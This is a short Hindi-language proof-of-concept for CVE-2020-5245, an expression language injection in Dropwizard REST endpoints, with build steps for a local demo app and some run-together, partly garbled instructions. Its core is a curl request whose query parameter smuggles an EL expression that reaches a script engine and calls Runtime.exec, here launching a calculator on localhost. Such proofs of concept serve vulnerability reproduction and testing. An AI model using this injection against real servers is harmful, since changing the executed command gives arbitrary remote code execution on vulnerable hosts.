
CVE-2020-5245 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो निर्मित HTTP पैरामीटर के माध्यम से Dropwizard REST endpoints में एक्सप्रेशन भाषा इंजेक्शन का प्रदर्शन करता है।
mvn clean install चलाएंjava -jar target/dropwizard-1.0-SNAPSHOT.jar server config.yml के साथ एप्लिकेशन प्रारंभ करेंhttp://localhost:8080 दर्ज करेंpom.xml में कुछ त्रुटि प्लगइन्स प्रभावित नहीं हुए पुनरुत्पादन

curl http://localhost:8080/bookService/selfValidatingBeanParam?answer=${%27%27.getClass().forName(%22javax.script.ScriptEngineManager%22).newInstance().getEngineByName(%22JavaScript%22).eval(%22java.lang.Runtime.getRuntime().exec(%27/usr/bin/gnome-calculator%27)%22)}